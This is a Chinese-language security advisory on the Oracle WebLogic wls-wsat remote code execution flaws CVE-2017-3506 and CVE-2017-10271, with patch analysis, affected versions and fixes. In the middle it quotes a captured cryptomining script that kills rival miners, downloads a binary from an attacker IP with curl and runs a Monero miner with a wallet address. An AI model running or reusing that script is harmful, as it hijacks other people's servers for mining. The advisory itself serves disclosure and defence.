【漏洞预警】Oracle WebLogic wls-wsat RCE CVE-2017-10271 & CVE-2017-3506

       Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。漏洞描述       早期,黑...

info.jpg

       Oracle Fusion Middleware(Oracle融合中间件)是美国甲骨文(Oracle)公司的一套面向企业和云环境的业务创新平台。该平台提供了中间件、软件集合等功能。Oracle WebLogic Server是其中的一个适用于云环境和传统环境的应用服务器组件。

漏洞描述

       早期,黑客利用WebLogic WLS 组件漏洞对企业服务器发起大范围远程攻击,有大量企业的服务器被攻陷,且被攻击企业数量呈现明显上升趋势,需要引起高度重视。其中,CVE-2017-3506是一个利用Oracle WebLogic中WLS 组件的远程代码执行漏洞,属于没有公开细节的野外利用漏洞,大量企业尚未及时安装补丁。官方在 2017 年 4 月份就发布了该漏洞的补丁。

补丁说明:

public WorkContextXmlInputAdapter(InputStream is) { ByteArrayOutputStream baos = new ByteArrayOutputStream(); try { int next = 0; next = is.read(); while (next != -1) { baos.write(next); next = is.read(); } } catch (Exception e) { throw new IllegalStateException("Failed to get data from input stream", e); } validate(new ByteArrayInputStream(baos.toByteArray())); this.xmlDecoder = new XMLDecoder(new ByteArrayInputStream(baos.toByteArray())); } private void validate(InputStream is) { WebLogicSAXParserFactory factory = new WebLogicSAXParserFactory(); try { SAXParser parser = factory.newSAXParser(); parser.parse(is, new DefaultHandler() { public void startElement(String uri, String localName, String qName, Attributes attributes) throws SAXException { if (qName.equalsIgnoreCase("object")) { throw new IllegalStateException("Invalid context type: object"); } } }); } catch (ParserConfigurationException e) { throw new IllegalStateException("Parser Exception", e); } catch (SAXException e) { throw new IllegalStateException("Parser Exception", e); } catch (IOException e) { throw new IllegalStateException("Parser Exception", e); } }

只是在反序列化之前增加了一个validate函数,如果qName等于object,就抛出异常终止。可谓简单暴力,然而,这里的黑名单这种修复,很难彻底修复完整。值得深思…         

       该漏洞的利用方法较为简单,攻击者只需要发送精心构造的 HTTP 请求,就可以拿到目标服务器的权限,危害巨大。由于漏洞较新,目前仍然存在很多主机尚未更新相关补丁。预计在此次突发事件之后,很可能出现攻击事件数量激增,大量新主机被攻陷的情况。

       Oracle官方四月份补丁对CVE-2017-3506该漏洞修复不彻底,可以绕过补丁,依旧执行远程命令。CVE-2017-10271目前绕过的漏洞在官方发布的十月份的补丁中已修复。

挖矿事件

       攻击者能够同时攻击Windows及Linux主机,并在目标中长期潜伏。由于Oracle WebLogic的使用面较为广泛,攻击面涉及各个行业。此次攻击中使用的木马为典型的比特币挖矿木马。但该漏洞可被黑客用于其它目的攻击。

以下是捕获到的挖矿木马下载脚本:

#!/bin/bash
function kills() {
	rm -rf /tmp/index_bak
	rm -rf /tmp/httpd.conf
	rm -rf /tmp/*httpd.conf
	rm -rf /tmp/a7b104c270
	pkill -9 AnXqV.yam
	ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep "[email protected]"|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “/tmp/a7b104c270”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQt989KEfGRt6Ww2Xg8”|awk ‘{print $2}’|xargs kill -9
	ps auxf|grep -v grep|grep “46SDR76rJ2J6MtmP3ZZKi9cEA5RQCrYgag7La3CxEootQeAQULPE2CHJQ4MRZ5wZ1T73Kw6Kx4Lai2dFLAacjerbPzb5Ufg”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “stratum.f2pool.com:8888”|awk ‘{print $2}’|xargs kill -9
ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9
}
function downloadyam() {
cd /tmp/
	if [ ! -f “Carbon” ];then
		curl http://45.123.190.178/Carbon > Carbon && chmod +x Carbon
		./Carbon -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe -p x -R 1 &>>/dev/null &
	else
./Carbon -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:80 -u 42HrCwmHSVyJSAQwn6Lifc3WWAWN56U8s2qAbm6BAagW6Ryh8JgWq8Q1JbZ8nXdcFVgnmAM3q86cm5y9xfmvV1ap6qVvmPe -p x -R 1 &>>/dev/null &
	fi
}
kills
p=$(ps aux | grep Carbon | grep -v grep | wc -l)
if [ ${p} -eq 1 ];then
	echo "officeing"
elif [ ${p} -eq 0 ];then
	downloadyam
else
	echo ""
fi

漏洞编号

CVE-2017-3506 (wls-wsat 远程命令执行漏洞)

CVE-2017-10271 (wls-wsat 远程命令执行绕过漏洞)

影响版本

Oracle WebLogic Server10.3.6.0.0 版本

Oracle WebLogic Server12.1.3.0.0 版本

Oracle WebLogic Server12.2.1.1.0 版本

Oracle WebLogic Server12.2.1.2.0 版本

漏洞利用过程

Poc暂不公开

CVE-2017-3506:

http://192.168.1.137:7001/wls-wsat/CoordinatorPortType

image.png

image.png

image.png

CVE-2017-10271

在公网上进行攻击:

使用Exp

image.pngimage.png

修复建议

  1. 升级Oracle 10月份补丁 http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

  2. 对访问wls-wsat的资源进行访问控制

  3. 临时解决方案

    根据实际环境路径,删除WebLogic程序下列war包及目录。

rm -f/home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf/home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat

      重启WebLogic服务或系统后,确认以下链接访问是否为404:

      http://ip:port/wls-wsat/CoordinatorPortType11

参考链接

http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3506

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-10271

http://www.cnvd.org.cn/flaw/show/CNVD-2017-31499

https://www.anquanke.com/post/id/92003?from=timeline&isappinstalled=0

http://suo.im/I3NjS

http://suo.im/19DoNp


文章版权归原作者所有,转载需取得作者本人同意 并注明出处:https://secfree.com/article-635.html

联系我们

邮件:[email protected]